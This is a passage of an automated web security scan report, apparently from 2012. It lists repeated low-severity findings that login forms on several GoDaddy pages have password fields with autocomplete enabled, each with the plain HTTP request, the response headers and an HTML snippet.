Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/net.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=1tpwb5cf4wcsgqjm0wtsurwx; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=1tpwb5cf4wcsgqjm0wtsurwx; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:33 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:33 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:33 GMT; path=/
Set-Cookie: SplitValue1=8; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:33 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/net.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=8; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:33 GMT
Connection: close
Content-Length: 130868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.80. http://www.godaddy.com/tlds/org.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/org.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/org.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=1jgx5n11p5zsvtfpwsxlcw32; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=1jgx5n11p5zsvtfpwsxlcw32; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:25 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:25 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:25 GMT; path=/
Set-Cookie: SplitValue1=49; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:25 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/org.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=49; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:24 GMT
Connection: close
Content-Length: 132156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.81. http://www.godaddy.com/tlds/us.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/us.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/us.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=4sb20f0wo1ljuh5lgxyayda5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=4sb20f0wo1ljuh5lgxyayda5; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:22 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:22 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:22 GMT; path=/
Set-Cookie: SplitValue1=98; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:22 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/us.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=98; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:22 GMT
Connection: close
Content-Length: 129004


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.82. http://www.godaddy.com/tlds/ws.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/ws.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/ws.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=dzw2mpmphtfnhppqpj1puysa; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=dzw2mpmphtfnhppqpj1puysa; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:30 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:30 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:30 GMT; path=/
Set-Cookie: SplitValue1=4; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:30 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/ws.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=4; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:30 GMT
Connection: close
Content-Length: 129788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.83. http://www.godaddy.com/tlds/xxx-domain.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/xxx-domain.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/xxx-domain.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=hs13gambhjf12ebhkttdy2n5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=hs13gambhjf12ebhkttdy2n5; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:24 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:24 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:24 GMT; path=/
Set-Cookie: SplitValue1=91; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:24 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/xxx-domain.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=91; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:24 GMT
Connection: close
Content-Length: 167830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.84. https://www.godaddy.com/Domains/Search.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /Domains/Search.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Domains/Search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=k2jqsg0don5vxc43ddmelvcb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=k2jqsg0don5vxc43ddmelvcb; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:13 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:13 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:13 GMT; path=/
Set-Cookie: SplitValue1=8; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:13 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Domains/Search.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=8; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=dcmduaecwdrcwejfwaajofhjhgcccdua; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:43:13 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=dcmduaecwdrcwejfwaajofhjhgcccdua; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:13 GMT
Connection: close
Content-Length: 183951


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.85. https://www.godaddy.com/Payment/payment-options.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /Payment/payment-options.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Payment/payment-options.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=znipwzi0ukgf3qa0ecrv3t0n; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=znipwzi0ukgf3qa0ecrv3t0n; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:27 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:27 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:27 GMT; path=/
Set-Cookie: SplitValue1=73; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:27 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=73; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:27 GMT
Connection: close
Content-Length: 104816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.86. https://www.godaddy.com/domains/customize.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/customize.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/customize.aspx?ci=14641 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.godaddy.com/domains/searchresults.aspx?ci=44919
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; pagecount=4; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=1&fMajorVer=11&slMajorVer=-1&slMinorVer=-1; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; adc1=US; currency1=potableSourceStr=USD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:32:35 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/searchresults.aspx?ci=44919&sitename=www.godaddy.com&page=/domains/customize.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=14641%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:32:35 GMT
Content-Length: 165054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.87. https://www.godaddy.com/domains/domain-broker.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/domain-broker.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/domain-broker.aspx?isc=GPPT03C034&domaintocheck=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=3yg3qkyower1enitk1mkfztm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=3yg3qkyower1enitk1mkfztm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:05 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:05 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:05 GMT; path=/
Set-Cookie: SplitValue1=68; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:05 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-broker.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=GPPT03C034&domaintocheck=edhardy.com&shopper=&privatelabelid=1&isc=GPPT03C034&clientip=174.36.218.2&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:04 GMT
Connection: close
Content-Length: 93987


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=GPPT03C034&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.88. https://www.godaddy.com/domains/domain-broker.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/domain-broker.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/domain-broker.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=auageiizdofjb210w1j2y0dm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=auageiizdofjb210w1j2y0dm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:03 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:03 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:03 GMT; path=/
Set-Cookie: SplitValue1=9; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:03 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-broker.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=9; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:03 GMT
Connection: close
Content-Length: 92865